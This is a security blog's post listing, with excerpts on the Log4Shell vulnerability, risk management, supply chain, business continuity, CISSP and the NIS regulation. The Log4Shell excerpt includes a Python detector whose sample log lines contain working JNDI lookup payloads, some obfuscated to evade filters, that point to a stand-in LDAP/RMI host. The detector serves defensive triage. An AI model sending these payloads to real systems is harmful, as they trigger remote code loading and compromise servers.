Log4Shell: Apache Log4j 2 CVE-2021-44228

If you haven’t been living under a rock for the past few days, you’ll know that last Friday a critical vulnerability in the Log4j 2 package, a massively used Java logging library, started to go viral.

This vulnerability, dubbed Log4Shell and discovered by Chen Zhaojun (software engineer at Alibaba), has been assigned CVE-2021-44228, with a CVSS score of 10.0.

Although by now there is a ton of public information about it, let’s go over a few key points.

The actors

Log4j 2: the Lookup plugin

As we have already mentioned, Log4j 2 is a logging library for Java applications, used by developers to record application information. Using it is as simple as calling something like log.debug("Test message"); in the code, which generates a log entry. Often the information logged concerns the application itself and its execution context, and it is not unusual for it to include data received from the outside, such as request headers or user-supplied identifiers.

One of the capabilities of the library, called Lookups, allows variables to be embedded in what is written to the log; at logging time they are replaced by the corresponding value, using the syntax ${variable}. For example, if we use ${java:runtime}, the entry the application writes will record the Java runtime version. The important detail is that the substitution is applied to the message text itself, so a lookup that arrives inside logged data is expanded exactly like one written by the developer.
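To make the substitution step concrete, here is an added example that is not code from the post or from Log4j itself: a small Python emulation of the ${prefix:key} lookup syntax, with a constructed subset of resolvers (java, env, lower, upper and the :-default fallback), followed by a detector that expands nested lookups in a handful of constructed access-log lines and flags any line that still carries a ${jndi:...} lookup afterwards. The jndi prefix is deliberately never resolved in this example; in the real library that is the prefix whose resolution performs the remote fetch.

```python
import re

# Innermost ${...}: a lookup whose body contains no further braces.
_INNERMOST = re.compile(r"\$\{([^{}]*)\}")

# A ${jndi:...} lookup surviving after expansion is what we want to catch.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed resolvers for this example; they are not Log4j's own
# implementation and the returned strings are made up.
RESOLVERS = {
    "java": lambda key: {"runtime": "Java(TM) SE Runtime Environment (build 11.0.13)",
                         "version": "Java version 11.0.13"}.get(key, ""),
    "env": lambda key: {"USER": "svc-app"}.get(key, ""),
    "lower": lambda key: key.lower(),
    "upper": lambda key: key.upper(),
}


def lookup_one(body, resolvers=RESOLVERS):
    """Resolve a single lookup body of the form 'prefix:key' or
    'prefix:key:-default'. Returns the value, the default when the lookup
    fails and a default was given, or None if the lookup is unresolvable."""
    default = None
    if ":-" in body:
        body, default = body.split(":-", 1)
    if ":" in body:
        prefix, key = body.split(":", 1)
        resolver = resolvers.get(prefix.strip().lower())
        if resolver is not None:
            value = resolver(key)
            if value:
                return value
    return default


def resolve_lookups(message, resolvers=RESOLVERS, max_passes=20):
    """Expand lookups innermost-first, repeating until no modelled lookup is
    left. Unresolvable lookups (unknown prefix, no default) are kept verbatim,
    so a ${jndi:...} assembled from pieces becomes visible in the result."""
    for _ in range(max_passes):
        changed = False

        def substitute(match):
            nonlocal changed
            value = lookup_one(match.group(1), resolvers)
            if value is None:
                return match.group(0)
            changed = True
            return value

        message = _INNERMOST.sub(substitute, message)
        if not changed:
            break
    return message


def is_jndi_lookup(message):
    """Detection only: True when the expanded message still contains a
    ${jndi:...} lookup. The jndi prefix is never resolved in this example."""
    return bool(_JNDI.search(resolve_lookups(message)))


# Constructed access-log lines (not real traffic). The User-Agent value is
# the attacker-controlled field that ends up in a log call.
SAMPLE_LINES = [
    '203.0.113.5 "GET / HTTP/1.1" 200 UA="Mozilla/5.0"',
    '203.0.113.5 "GET / HTTP/1.1" 200 UA="${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.5 "GET / HTTP/1.1" 200 UA="${${lower:J}${upper:n}di:ldap://198.51.100.7/a}"',
    '203.0.113.5 "GET / HTTP/1.1" 200 UA="${${::-j}ndi:rmi://198.51.100.7/a}"',
    '203.0.113.5 "GET / HTTP/1.1" 200 UA="${env:NOPE:-curl/7.79}" runtime=${java:runtime}',
]


def flag_lines(lines=SAMPLE_LINES):
    """Return the subset of lines that carry a jndi lookup after expansion."""
    return [line for line in lines if is_jndi_lookup(line)]


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print("ALERT" if is_jndi_lookup(line) else "ok   ", resolve_lookups(line))
```

The third and fourth sample lines show why matching the raw string for the literal text "jndi" is not enough: the lookup is assembled from other lookups and only appears after expansion. Conversely, a fixed set of modelled resolvers will always miss prefixes it does not know, so a detector like this is a triage aid for log review, not a substitute for upgrading the library.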

[Read more…]

De-constructing risk management (I): the inherent risk

Living beings are experts at managing risks. It’s something we have done over millions of years. It’s called, among other things, survival instinct. We wouldn’t be here if we were bad at it.

We avoid them, we mitigate them, we externalize them, we take them on.

For example, is it going to rain today? If it rains, how much is it going to rain? Do I take my umbrella? Do I stay home? Will I run into a traffic jam on the way to work? Will I be late for the meeting? Do I call to let you know? Do I try to postpone the meeting? Will I puncture a tire on the way home? When was the last time I checked the spare tire? Have I paid the insurance premium? What is the roadside assistance coverage?

All these everyday processes of risk identification and risk assessment are carried out unconsciously all the time, and we apply risk management measures without even realizing it. We grab an umbrella, call the office to inform them of a delay, attend the meeting by phone, leave home earlier or decide to take public transport. Obviously, it’s not always that easy.

However, when we move to the corporate environment, we start with risk tolerance, probability, impact and vulnerability criteria, threat catalogs (standard), strategies, risk registers, inherent, residual and projected risk, mitigation ratios. And we get lost for months in concepts, documents and methodologies, moving further and further away from the reality we have to analyze and protect.

The orthodoxy of (cybersecurity) risk management

As a result of this, a few months ago, in the middle of the pandemic, I came across an interesting article that contrasted two very different visions of risk management, which it called RM1 vs RM2.

Basically, and quoting directly from the article, RM1 would be focused on “risk management for external stakeholders (Board, auditors, regulators, government, credit rating agencies, insurance companies and banks)”, while RM2 would be “risk management for decision makers within the company”.

A few weeks or months later, Román Ramírez published an entry in a similar vein, criticizing the prevailing orthodoxy in cybersecurity risk management and the problems it generated.

[Read more…]

The supply chain and the elephant in the room

A few days ago, in the wake of ransomware attacks “related” to the Kaseya remote IT management product, I posted on LinkedIn a short post in which I said the following:

Supply chain is the elephant in the room and we need to talk more about it.

Yes, let’s talk a little bit about prevention and leave detection and management for another time. As the saying goes, better safe than sorry. To develop it a bit further, I added that:


we should start thinking that third-party software and hardware are insecure by default and that an obligation should be imposed on software manufacturers to perform and publish, to some extent, serious, regular, in-depth pentesting for the critical applications they sell (and their updates). And even then, any third-party software or device should be considered insecure by default, unless proven otherwise.


In a comment, Andrew (David) Worley referred to SOC 2 reports, which should be able to minimally prevent these kinds of “problems”, and commented on a couple of initiatives I was unaware of: the Software Bill of Materials (SBoMs) and the Digital Bill of Materials (DBoMs).

I promise to talk about it in another post, but for now let’s move on.

[Read more…]

Enterprise immortality?

Far too long ago I spent about a year at the Georgia Institute of Technology in Atlanta, continuing my university studies. Shortly after arriving, the person in charge of campus security gave us a talk in which he congratulated us on the fact that Atlanta was no longer the most dangerous city in the USA, but the second most dangerous (we are talking about 1999). He also warned us, addressing the younger ones in particular, to be careful with the illusions of immortality typical of teenagers, to avoid unnecessary risks and to adopt certain safety measures.

I have a feeling that this kind of illusion applies quite well to many companies. In general, the thinking that still prevails in many organizations is the familiar one: it can’t happen to us. The equivalent is the driver who gets in the car thinking that accidents happen to everyone but him and ignores seat belts and any “reasonable” speed limit.

[Read more…]

Business continuity: things to consider

Let’s continue with business continuity. Today I would like to review some points to be taken into account during the implementation of a Business Continuity Plan, which I consider essential to achieve a successful outcome:

1. The scope

2. Senior management support

3. Investment

4. Setting the recovery time objectives

And with this extremely short introduction, let’s go into the matter.

1. The scope

The first aspect that we must take into account is the scope of our Business Continuity Plan (BCP), in two different senses. In a horizontal sense, it is necessary to clearly define which services, activities or processes are going to be included in the BCP, and this is mandatory if we also intend to certify the management system under the ISO 22301 standard. From the point of view of the BCP’s usefulness the most logical thing is to include the entire organization, especially in small companies where the infrastructure is shared by the whole organization, but it is also possible to choose a reduced scope that covers relatively independent elements (a local branch or the company’s headquarters, for example), or simply to include those processes that are known beforehand to be the most critical for the organization’s continuity, such as production or logistics in a more industrial company, or the web portal in a purely e-commerce company.

[Read more…]

Cloud meets business continuity

Following the introductory cloud post a few days ago, and to avoid losing momentum, we are going to keep talking about the cloud, in an area where it seems particularly useful: business continuity. Along with other measures, it is clear that the existence of globally distributed datacenters (did someone say GDPR?), flexible system scaling and almost instantaneous deployment make a cloud infrastructure (all else being equal) more resilient to outages than an on-premise infrastructure. Of course, availability is not the only factor to consider, but we’ll talk about that another day.

However, when it comes to singing the praises of the cloud, the providers already do a pretty good job themselves. What I want to talk about is some of the issues that must be considered before migrating an infrastructure to the cloud (although some of these points also apply to PaaS and SaaS). That is: the problems.

[Read more…]

The fight for privacy

The post, next week.

Own text. Original comic strip by RaphComic. Modified with permission.

CISSP certificate – II. Personal experience

In yesterday’s post we saw some general aspects of the CISSP certification, which can be expanded on by consulting the official (ISC)2 website. In this post I will go into detail on the non-formal aspects, such as materials, advice and personal opinions. Let’s get started.

Is the exam difficult?

If you search on Google, the main user communities related to (ISC)2 are found on reddit and in the (ISC)2 forums. Both contain many threads sharing opinions and exam experiences, asking for and giving advice, reviewing study materials and so on. However, my impression is that the tone tends to be negative and somewhat frightening, terrifying even at times. Many people who have taken the exam describe it as very difficult and obscure, with tricky wording. In addition, there are no “sample” questions on the Internet, and the people who produce the training material (including the official question book) or teach the training courses (bootcamps) are never the same people who write the exam questions. Therefore, a critical element to manage during exam preparation is uncertainty.

[Read more…]

CISSP certificate – I

A few years ago (2011), our colleague José Luis Villalón told us about the (ISC)2 CISSP certification. As things have changed somewhat since then, and taking advantage of the fact that I recently passed the exam, we are going to take a look at this certification, the changes it has undergone and (in the next post) some advice that has personally helped me to pass the exam.

Introduction

The CISSP (Certified Information Systems Security Professional) certification of (ISC)2 is currently one of the main (basic, in my view, although that depends on your experience and background) certifications in the field of information security, although it is more widespread in the USA than in other countries if we look at the number of certificate holders per country. While on 31 December 2018 the US had around 84,500 certificate holders, Germany (2,100), France (1,000), Italy (400) and Spain (650) together barely reach 4,000. This is probably due to the fact that many Human Resources departments in the US consider CISSP a basic prerequisite in the field of cybersecurity, in addition to the significantly greater acceptance that (ISC)2 certificates have in the US market.

[Read more…]

Publication of the NIS Implementation Regulation (for digital service providers)

(This entry has been prepared in collaboration with Ana Marzo, from Equipo Marzo, which provided a good part of the information).

Just a couple of weeks ago Ana Marzo, from Equipo Marzo, an attorney for whom I have great professional respect, contacted me to tell me about the publication, unexpected (at least by me), of a new Commission regulation related to the NIS Directive, which, in a display of originality, I have called the NIS implementation regulation.

In fact, Commission Implementing Regulation (EU) 2018/151 of 30 January 2018 has been published, laying down rules for the application of Directive (EU) 2016/1148 of the European Parliament and of the Council as regards further specification of the elements to be taken into account by digital service providers for managing the risks posed to the security of network and information systems and of the parameters for determining whether an incident has a substantial impact.

It caught me by surprise, at least (and I am sure some of our readers will feel the same), since I expected a transposition of the directive, not a regulation emanating directly from the Commission (which does not mean, of course, that we will not enjoy our own NIS-compliant legislation, as the legislator must be kept busy…). Given that, although in different areas, we had both worked for the same client, one that fits the concept of a digital service provider and could therefore be affected, we asked ourselves about the applicability of the regulation to that specific client. For example, is an online newspaper affected? And an online sales website? An online bingo? And a platform for sales between private individuals? Working out the answer to these questions is the subject of this entry.
[Read more…]